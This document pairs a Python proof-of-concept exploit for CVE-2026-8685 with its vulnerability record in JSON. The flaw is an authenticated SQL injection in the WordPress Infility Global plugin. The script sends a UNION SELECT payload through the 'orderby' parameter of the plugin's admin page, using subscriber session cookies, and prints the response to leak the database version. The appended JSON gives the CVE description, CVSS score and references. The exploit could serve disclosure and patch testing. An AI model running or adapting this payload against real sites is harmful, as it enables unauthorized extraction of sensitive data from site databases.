CVE-2026-8685

import requests # Proof of Concept for CVE-2026-8685 # Target: WordPress Infility Global Plugin <= 2.15.16 # Description: Authenticated SQL Injection via 'orderby' parameter def exploit(url, cookies): # The vulnerable endpoint is the admin menu page registered by the plugin target_url = f"{url}/wp-admin/admin.php" # Malicious payload to extract database version using UNION based SQL injection # Example payload: ORDER BY 1 UNION SELECT 1,2,version(),4,5,6,7,8,9,10-- - # Adjust the number of columns based on the original query structure payload = { "page": "infility-global-show-control-data", "orderby": "1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10-- -", "order": "asc" } try: response = requests.get(target_url, params=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check the response body for potential database version leakage.") print(response.text[:500]) # Print snippet of response else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target URL and valid subscriber cookies target = "http://localhost" # Example cookie format for a logged-in subscriber subscriber_cookies = { "wordpress_logged_in_...": "valid_cookie_value_here" } exploit(target, subscriber_cookies)

{"cve": {"id": "CVE-2026-8685", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:41.143", "lastModified": "2026-05-20T02:16:41.143", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Infility Global plugin for WordPress is vulnerable to SQL Injection via the 'orderby' and 'order' parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the 'read' capability. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L34", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L74", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L78", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L84", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=cve", "source": "[email protected]"}]}}